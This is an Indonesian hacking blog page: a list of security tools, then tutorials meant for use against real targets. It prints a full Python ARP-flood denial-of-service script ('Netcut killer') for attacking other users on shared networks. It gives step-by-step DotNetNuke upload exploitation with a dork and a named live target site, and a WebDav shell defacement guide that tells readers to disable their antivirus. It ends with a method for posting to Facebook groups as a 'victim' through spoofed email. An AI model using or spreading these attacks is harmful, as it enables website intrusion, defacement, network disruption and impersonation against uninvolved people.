Headline News:

10 Tool Favorit Hacker


1. Nessus 

“Nessus” pertama kali dibuat oleh Renaud Deraison pada tahun 1998 dan disebarkan untuk komunitas internet secara bebas, bermanfaat, ter-update dengan baik serta mudah untuk digunakan.

Nessus adalah sebuah program untuk mencari kelemahan pada sebuah sistem komputer. Menurut situs resminya di www.nessus.org, tool ini telah digunakan oleh lebih dari 75.000 organisasi dan perusahaan di seluruh dunia.

2. Snort

Snort adalah sebuah IDS, yaitu tool untuk mencegah dan mendeteksi serangan terhadap sistem komputer. Vendor dari snort mengklaim bahwa tool ini telah didownload berjuta-juta kali dari situs mereka. Anda mungkin berminat untuk mencobanya, silahkan download tool ini di www.snort.org.

3. Kismet

Kismet adalah sebuah tool untuk mendeteksi koneksi wireless(mendukung lalu lintas 802.11b, 802.11a, dan 802.11g ) , menangkap paket dalam sebuah sistem jaringan dan menjadi sebuah IDS (intrusion detection System).

Untuk mencari tahu lebih lanjut mengenai kismet, anda dapat mengunjungi situs http://www.kismetwireless.net atau masuk ke #kismet irc.freenode.net.

4. Metasploit Framework

Metasploit Framework adalah sebuah proyek open source untuk mengembangkan, menguji dan menggunakan kode eksploit. Dibuat dengan bahasa Perl sebagai fondasi dasar dan dan terdiri dari komponen pelengkap yang telah dicompile dengan bahasa C, assembler dan Python. Metasploit Framework dapat berjalan pada sistem operasi UNIX, Linux dan Windows. Keterangan yang lebih detail dapat anda cari di http://www.metasploit.com.

5. Netcat

Netcat adalah sebuah tool networking utility yang dapat membaca dan menulis data pada koneksi sebuah jaringan melalui protokol TCP/IP.

Fitur yang terdapat pada Netcat antara lain :


  1. Koneksi keluar dan masuk melalui protokol UDP ataupun TCP dengan port yang digunakan.
  2. Tunneling mode, tunneling dari UDP ke TCP, memetakan parameter dalam jaringan (source port/interface, listening port/interface, dan mengijinkan remote host melakukan koneksi ke tunnel)
  3. Port scanner, untuk mendeteksi port yang terbuka.
  4. Buffered send-mode dan hexdump RFC854 telnet.
6. Hping


Hping merupakan sebuah tool serba guna. Tool ini dapat digunakan untuk menguji kemampuan firewall, mencari port yang terbuka, menguji keamanan jaringan dengan menggunakan berbagai jenis protokol, mendapatkan informasi sistem operasi, mengevaluasi protokol TCP/IP.

7. TCPDump

Tcpdump juga merupakan sebuah sniffer. Admin jaringan menggunakan tool ini untuk memonitor lalu lintas dan menganalisa permasalahan jika terjadi gangguan. Menurut informasi di http://www.iepm.slac.stanford.edu/monitoring/passive/tcpdump.html , Tcpdump menggunakan paket filter dari UNIX BSD untuk meng-capture data(BPF / BSD Packet Filter).BPF menerima salinan dari driver pengirim dan penerima paket.Pengguna tcpdump juga dapat menyaring paket sesuai dengan keinginan.

8. John The Ripper

Sebuah password cracker dari jaman nenek moyang para hacker yang masih menjadi 10 besar tool favorit. Berikut adalah keterangan dari pembuat John The Ripper.

“John the Ripper is a password cracker, currently available for UNIX, DOS,WinNT/Win95. Its primary purpose is to detect weak UNIX passwords. It has been tested with Linux x86/Alpha/SPARC, FreeBSD x86, OpenBSD x86, Solaris 2.x SPARC and x86, Digital UNIX, AIX, HP-UX, and IRIX”.

9. Cain And Abel

Cain & Abel adalah sebuah tool untuk masalah password. Tool ini dapat mengumpulkanpassword dengan metode network sniffing, meng-crack password menggunakan Dictionary attack, Brute-Force and Cryptanalysis attacks, merekam pembicaraan VoIP (Voice Over Internet Protocol), meng-crack jaringan wireless, menganalisa trafik dalam jaringan. www.oxid.it

10. WireShark / Ethereal

Wireshark / Ethereal adalah sebuah tool untuk menganalisa protokol jaringan. Fungsinya juga sebagai sebuah sniffer. Memantau lalu lintas internet. Wireshark

dapat berjalan pada Windows, MAC OS X, dan Linux. 

========================================================================
itulah diantara 10 tool Favorit Hacker ..


Tertarik? 
Pelajari dan pahami saja cara penggunaan 10 tool tsb. 
Kita memang tdk akan semudah itu menjadi hacker hebat hanya dengan mengandalkan 10 tool diatas. 
Tapi tool2 tsb sudah diakui oleh semua tingkatan Hacker. 
Kan bisa menjadi tambahan bagi anda2 yang ingin menggeluti sekuriti komputer secara mendalam.


Serang Balik Pengguna Netcut

Koneksi putus bukan menjadi sebuah dilema lagi, melainkan bisa dikarenakan beberapa sebab. Terutama di hotspot gratisan atau di warnet-warnet, kalau koneksi kita lemot dan tidak bisa akses internet dengan tidak normal, mungkin salah satunya karena ada pengguna warnet lainnya yang menggunakan NETCUT.

 Agar tidak bete karena loading lama, serang balik saja pengguna NETCUT tersebut.



  1. Harus sudah terdapat python compiler di komputer
  2. Download toolsnya disini: http://1337day.com/exploits/17338
  3. Jalankan tools tersebut dengan compile: python filenameexploit.py [ethernet] [macaddress], contoh: python netcutkiller.py eth0 A1:B2:C3:D4:E5:F6

Code exploitnya adalah sebagai berikut:

  • #!/usr/bin/env python
  • #Exploit Title: Netcut Denial of Service Vulnerability
  • #Author: MaYaSeVeN
  • #Greetz: Inj3ct0r 1337day Exploit DataBase (1337day.com)
  • #Blog: http://mayaseven.blogspot.com
  • #PoC: Video http://www.youtube.com/user/mayaseven
  • #Picture http://3.bp.blogspot.com/-GcwpOXx7ers/TwGVoyj8SmI/AAAAAAAAAxs/wSGL1tKGflc/s1600/a.png
  • #Version: Netcut 2
  • #Software Link: http://www.mediafire.com/?jiiyq2wcpp41266
  • #Tested on: Windows Xp, Windows 7
  • #Greetz : ZeQ3uL, c1ph3r, x-c0d3, p3lo, Retool2, Gen0TypE, Windows98SE, Sumedt, Rocky Sharma

  • from scapy.all import sniff,Ether,ARP,RandIP,RandMAC,Padding,sendp,conf
  • import commands,os,sys

  • #gw_mac = commands.getoutput("arp -i %s | grep %s" % (conf.iface,conf.iface)).split()[2]
  • gw_ip = commands.getoutput("ip route list | grep default").split()[2]

  • def protect(gw_ip,gw_mac):
  • os.popen("arp -s %s %s" %(gw_ip,gw_mac))
  • print "Protected himself"

  • def detect():
  • ans = sniff(filter='arp',timeout=7)
  • target=[]
  • for r in ans.res:
  • target.append(r.sprintf("%ARP.pdst% %ARP.hwsrc% %ARP.psrc%"))
  • return target

  • def preattack(gw_ip):
  • num = []
  • count = 0
  • target = 0
  • temp = 0
  • print "Detecting..."
  • d = detect()
  • for i in range(len(d)):
  • if d[i].split()[0] == "255.255.255.255":
  • num.append(d.count(d[i]))
  • if d.count(d[i]) > count:
  • count = d.count(d[i])
  • target = i
  • if d[i].split()[0] == gw_ip:
  • temp += 1 
  • if len(d) < 7:
  • print "[-] No one use Netcut or try again"
  • exit()
  • if len(num)*7 < temp:
  • num[:] = []
  • count = 0
  • result = float(temp)/len(d)*100
  • for j in range(len(d)):
  • if d[i].split()[0] == gw_ip:
  • num.append(d.count(d[j]))
  • if d.count(d[i]) > count:
  • count = d.count(d[i])
  • target = i
  • num.reverse()
  • result = float(temp)/len(d)*100
  • print target
  • else:
  • num.reverse()
  • result = float(num[0]+temp)/len(d)*100

  • print "There is a possibility that " + str(result) + "%"
  • if result>= 50:
  • target_mac = d[target].split()[1]
  • target_ip = d[target].split()[2]
  • print "[+]Detected, Netcut using by IP %s MAC %s" %(target_ip,target_mac)
  • attack(target_mac,target_ip,gw_ip)
  • else:
  • print "[-] No one use Netcut or try again"

  • def attack(target_mac,target_ip,gw_ip):
  • print "[+]Counter Attack !!!"
  • e = Ether(dst="FF:FF:FF:FF:FF:FF")
  • while 1:
  • a = ARP(psrc=RandIP(),pdst=RandIP(),hwsrc=RandMAC(),hwdst=RandMAC(),op=1)
  • p = e/a/Padding("\x00"*18)
  • sendp(p,verbose=0)
  • a1 = ARP(psrc=gw_ip,pdst=target_ip,hwsrc=RandMAC(),hwdst=target_mac,op=2)
  • p1 = e/a1/Padding("\x00"*18)
  • sendp(p1,verbose=0)

  • if __name__ == '__main__':
  • os.system("clear")
  • print "###################################################"
  • print " __ __ __ __ _____ __ __ _ _"
  • print "| \/ | \ \ / / / ____| \ \ / / | \ | |"
  • print "| \ / | __ \ \_/ /_ _| (___ __\ \ / /__| \| |"
  • print "| |\/| |/ _\ \ / _\ |\___ \ / _ \ \/ / _ \ . \ |"
  • print "| | | | (_| || | (_| |____) | __/\ / __/ |\ |"
  • print "|_| |_|\__,_||_|\__,_|_____/ \___| \/ \___|_| \_|"
  • print " "
  • print "###################################################"
  • print ""
  • print "http://mayaseven.blogspot.com"
  • print ""
  • if len(sys.argv) == 2 or len(sys.argv) == 3:
  • if len(sys.argv) == 2:
  • conf.iface=sys.argv[1]
  • preattack(gw_ip)
  • if len(sys.argv) == 3:
  • conf.iface=sys.argv[1]
  • gw_mac = sys.argv[2]
  • protect(gw_ip,gw_mac)
  • preattack(gw_ip)
  • else:
  • print '''Mode:
  • 1.)Attack only
  • Usage: NetcutKiller 
  • e.g. NetcutKiller.py wlan0

  • 2.)Attack with protect himself
  • Usage: NetcutKiller 
  • e.g. NetcutKiller.py wlan0 00:FA:77:AA:BC:AF
  • '''


  • # 1337day.com [2012-01-04]


Selamat Mencoba Semoga Berhasil
binus

Video Wireless Password Hacking



Berikut ini adalah beberapa video tutorial untuk hacking wireless, cracking wireless, hacking wifi, hacking password wi-fi, hacking wpa, hacking wep, cracking wpa, cracking wep, crack wpa, crack wep, hack wireless, hack hotspot, crack hotspot, cracking hotspot, hacking hotspot, hacking wi-fi, cracking wi-fi, hack wi-fi, crack wi-fi.

Pendahuluan:

Wi-Fi merupakan kependekan dari Wireless Fidelity, yang memiliki pengertian yaitu sekumpulan standar yang digunakan untuk Jaringan Lokal Nirkabel (Wireless Local Area Networks – WLAN) yang didasari pada spesifikasi IEEE 802.11. Standar terbaru dari spesifikasi 802.11a atau b, seperti 802.11 g, saat ini sedang dalam penyusunan, spesifikasi terbaru tersebut menawarkan banyak peningkatan mulai dari luas cakupan yang lebih jauh hingga kecepatan transfernya

Awalnya Wi-Fi ditujukan untuk penggunaan perangkat nirkabel dan Jaringan Area Lokal (LAN), namun saat ini lebih banyak digunakan untuk mengakses internet. Hal ini memungkinan seseorang dengan komputer dengan kartu nirkabel (wireless card) atau personal digital assistant (PDA) untuk terhubung dengan internet dengan menggunakan titik akses (atau dikenal dengan hotspot) terdekat.

WPA (bahasa Inggris: Wi-Fi Protected Access) adalah suatu sistem yang juga dapat diterapkan untuk mengamankan jaringan nirkabel. Metoda pengamanan dengan WPA ini diciptakan untuk melengkapi dari sistem yamg sebelumnya, yaitu WEP. Para peneliti menemukan banyak celah dan kelemahan pada infrastruktur nirkabel yang menggunakan metoda pengamanan WEP. Sebagai pengganti dari sistem WEP, WPA mengimplementasikan layer dari IEEE, yaitu layer 802.11i. Nantinya WPA akan lebih banyak digunakan pada implementasi keamanan jaringan nirkabel. WPA didesain dan digunakan dengan alat tambahan lainnya, yaitu sebuah komputer pribadi (PC).

Fungsi dari komputer pribadi ini kemudian dikenal dengan istilah authentication server, yang memberikan key yang berbeda kepada masing–masing pengguna/client dari suatu jaringan nirkabel yang menggunakan akses point sebagai media sentral komunikasi. Seperti dengan jaringan WEP, metoda enkripsi dari WPA ini juga menggunakan algoritma RC4.

Pengamanan jaringan nirkabel dengan metoda WPA ini, dapat ditandai dengan minimal ada tiga pilihan yang harus diisi administrator jaringan agar jaringan dapat beroperasi pada mode WPA ini. Ketiga menu yang harus diisi tersebut adalah:


Server
Komputer server yang dituju oleh akses point yang akan memberi otontikasi kepada client. beberapa perangkat lunak yang biasa digunakan antara lain freeRADIUS, openRADIUS dan lain-lain.
Port
Nomor port yang digunakan adalah 1812.
Shared Secret
Shared Secret adalah kunci yang akan dibagikan ke komputer dan juga kepada client secara transparant.

Setelah komputer di install perangkat lunak otontikasi seperti freeRADIUS, maka sertifikat yang dari server akan dibagikan kepada client.

Untuk menggunakan Radius server bisa juga dengan tanpa menginstall perangkat lunak di sisi komputer client. Cara yang di gunakan adalah Web Authentication dimana User akan diarahkan ke halaman Login terlebih dahulu sebelum bisa menggunakan Jaringan Wireless. Dan Server yang menangani autentikasi adalah Radius server.

Berikut ini adalah beberapa videonya:















Selamat Menikmati & Semoga Menambah Ilmu

Google Chrome Sebagai Mesin Hacking

Disini saya akan mencoba menjelaskan dan berbagi informasi mengenai bagaimana menjadikan Google Chrome sebagai Mesin Hacking dengan “KromCAT - Google Chrome Catalog of Auditing exTensions“. Yang dibuat oleh Nabil OUCH dan informasi ini diperoleh dari vulnerability database resources.


Silakan ditonton  implementasinya pada video berikut:



Namun untuk menjadikan Google Chrome Sebagai Mesin Hacking yang handal, kita membutuhkan beberapa tools yang mendukung. Dimana saya menggunakan hal ini untuk melakukan audit site.

Nah, berikut adalah roadmap catalog dan plugin yang bisa digunakan agar google chrome menjadi browser yang powerfull untuk aktifitas hacking. Ada beberapa tool didalamnya mengenai “Information Gathering Tools, Application Assessment, Editors, Network Utilities, Miscellaneous, Proxies And Web Utilities, IT Security Related“.  Silakan dilihat detailnya digambar berikut:

roadmap presented by vulnerabilitydatabase


jika ingin melakukan aktifitas penetration testing atau audit untuk website / target. Sebaiknya siapkan peralatan di atas untuk menunjang keberhasilan aktifitas yang dilakukan.

Semoga informasi ini bermanfaat buat anda semua.

Hacking Website Melalui Handphone


Pada dasarnya aplikasi web browser di HP maupun di PC itu cara kerjanya sama, yang membedakan adalah system yg bekerja mendukung aplikasi itu sendiri (Java, Symbian, Linux, Windows, Android etc..) Dan ukuran atau kapasitas serta kemampuan menampilkan web. Tapi pada dasarnya cara kerjanya tetap Sama, jadi apa yg bisa dilakukan lwt pc,kmgknan bsa jg dikerjakan lewst handphone.


Nah yg coba saya bahas disini adalah exploit web dengan cara hack web melalui DNN (dot net nuke) exploit melalui handphone..

Bahan2 yg kita butuhkan adalah:

  1. Operamini browser versi 5.0
  2. Operamini browser versi 4.2

Kenapa pake 2 Web Browser ?
Lebih enak pake 2 browser di atas.alasannya adalah:


  1. Operamini 5.0 mendukung multi tab jadi cocok buat mencari target dan mengetesnya tanpa harus open close satu2.
  2. Operamini 5.0 mempunyai kemampuan copy paste, pilih text dan langsug mensearchnya dlm sekali klik ditab yg sama ataupun membukanya di tab baru.
  3. Operamini 4.2 respon browser lebih bagus dari yang v5.0
Setelah cek target dr opmin 5.0 dan ternyata vuln tgl copy kan aja linknya di operamini 4.2 .
Tanggal kta exploit lewat situ.
(Operamini 4.2 tdk multi tab,untuk yg multi tab slhkan cari di opera modif di google)

Nah sekarang memasuki langkah2 atau cara2 melakukan hack web dgn DNN exploit melalui opera mini.

Pertama: pastikan anda masih mempunyai saldo pulsa
Kedua: buka operamini v 5.0 anda dan ketik di kolom google search dorknya->

inurl:”/portals/0″  

and search ..
Setelah dapat, Tinggal kita pilih target yang pas di hati.dan kali ini saya coba di situs orang israel.
Taruh cursor di link target trus tekan angka 1 di keypad handphone anda.
Pilih open in new tab.
Begitu seterusnya untuk link target yg lain sampai keluar beberapa tab.
lalu untuk mengetahu gimana, apa dan bagaimana DNN exploit it silahkan baca disini:


Next, misalkan kita dah dapet targetnya.

Example site:
http://fril.co.il/portals/0/cwindex.txt


Seperti keterangan di security reason di atas kita coba potong link target dan menggantinya dengan
/Providers/HtmlEditorProviders/ Fck/fcklinkgallery.aspx  

http://site.com/[path]/portals/0/a.txt

Menjadi >>>

http://site.com/[path]/Providers/HtmlEditorProviders/ Fck/fcklinkgallery.aspx  

Lakukan itu pada semua target yg udah kamu buka pada browser operamini 5.0 kamu, biar gak bolak balik
copas lagi.

Setelah dapet dan pasti vuln seperti site di bawah ini.
http://fril.co.il//Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

Copy dan pastekan di opera 4.2 kamu.

NB: alasannya kenapa pindah browser yaitu pada opera 5.0 di handphone saya kurang respon pada perintah upload. Proses upload berjalan tapi file tidak terupload dan begitu di coba di v4.2 sukses terupload. Tapi bila di v.5.0 kamu bisa ya lanjut aja disitu gak ush pindah aplikasi.

Lanjut proses.!
Setelah site target di buka di opmin 4.2

Pilih : file ( select a file on your site)

Tunggu biar loading selesai dan menampilkan 2 kolom:

Kolom 1 biasanya tulisan ‘root’
Kolom 2 berisi macam2 file.
Setelah loading selesai hapus link di addres bar operamini kamu dan ganti dgn script di bawah ini:
javascript:__doPostBack(‘ctlURL $cmdUpload’,”)

Lalu Okay 

Kolom yg tadinya berisi ‘root’ dan ‘jenis2 file’
Sekarang ganti menjadi kolom ‘root’ dan kolom kosong untuk upload file.
Nah sekarang tinggal kamu upload tuh file txt yg udah kamu simpan di handphone kamu.

NB: angka 1 di operamini berfungsi untuk copas, select text and open new tab.

Deface Dengan WebDav Shell Maker

Saya akan memberikan tutorial dan link download WebDav.
 Berhubung kebanyakan Hacker pemula menggunakan cara ini, Jadi tidak usah khawatir akan kerusakan website, Karena hanya halaman index saja yang di deface .

Download Files Berikut :


Password:

*NB: Tutup antivirus anda, kalau tidak antivirus akan detect rootkit sebagai virus.

Mungkin aplikasi Hmei7 ini terdeteksi Virus Rooit atau Malware tetapi sebenarnya pada aplikasi ini tidak mengandung virus, Saya sudah menyimpan aplikasi ini sekitar 2 minggu dan tidak terjadi apa-apa pada komputer saya sebaiknya matikan antivirus sebelum membuka aplikasi ini.

Deface menggunakan aplikasi ini adalah deface dalam bentuk asp, dan shellnnya sudah berada pada aplikasi ini jadi tidak usah memerlukan shell lain sperti b473k dan c99 tidak bisa digunakan untuk ini karena shell didalam adalah shell hanya untuk website ASP.

Tutorial Sebagai Berikut:

1. Jalankan Softwarenya.


2. Pilih WebDav >> ASP Shell Maker


3. Terus Klik Add Site >> Masukkan Website Target


4. Bila Berhasil akan ada penampakan seperti ini:


5. Terus hasilnya copas pada address bar, Maka akan ada tampilan seperti ini .


6. Cari file Index atau apa saja lah yang bisa merubah tampilan website nya, edit / upload file tersebut dengan script halaman deface. Contohnya seperti ini:


Okay.
Mungkin ini dulu yang sedikit bisa saya sharing untuk Kalian semua, Untuk selanjutnya silahkan berkreasi :D
Semoga bermanfaat (y)








Tutorial & Download Resource Hacker


Apa itu Resource Hacker ??? dari judul nya saja mungkin anda sudah bisa menebak, bahwa ini merupakan Software FreeWare  yang tugas nya.
1. Membuka source kode dari (*.exe, *.dll, *.cpl, *.ocx)
2. Merubah dan mengedit source secara langsung.
3. Memodifikasi secara langsung.

Nah 3 itu merupakan pokok penting dari Resource Hacker.
Kita ketahui dan kita pikir ? jika kita bisa membuka source dari software, berarti kita bisa membuat software itu juga .
Berikut Screenshotnya:


Gambar di atas, saya lagi membuka source PhotoScape.
Setelah saya buka, dan saya buka table dialog, maka saya dapat kode sama tampilan nya seperti apa ? lihat gambar di bawah ini.


Pelajari sendiri bagaimana cara pakai nya, biar anda bisa menjadi seorang master


untuk mendapatkan Softwarenya langsung saja download

Posting Di Group Facebook Tanpa Login


Facebook kini membuat fitur baru pada situsnya, yaitu mengirimkan postingan melalui email anda. Cara kerjanya:


  1. Login ke akun email anda
  2. Buat sebuah surat (email) baru
  3. Isi Form dengan :
  • To : Alamat grup facebook (contoh: tkjnasional@groups.facebook.com)
  • Subject : Judul postingan
  • Isi pesan sesuai dengan isi postingan anda

Lihat Gambar di bawah sebagain contoh:





One More Time....

Nah, tutorial Sebelumnya hanya sebatas memposting dengan akun kita melalui email yang terdaftar dengan akun kita.
Lalu, bagaimana caranya saya bisa memposting tanpa login ke akun ‘korban’ ???

Cukup anda memakai email palsu (Fake Email)

  1. Ke Situs ini atau situs fake mail lainnya
  2. Isikan form seperti ini:


3. Click Send ...


Selamat belajar & semoga bermanfaat 



Diberdayakan oleh Blogger.

ARTIKEL RYB-ART

Artikel Lainnya

Artikel Lainnya »
 
this is RYB ART | Site Meter
Copyright © 2012. RIZKY YANDA BAHRI ART COM - All Rights Reserved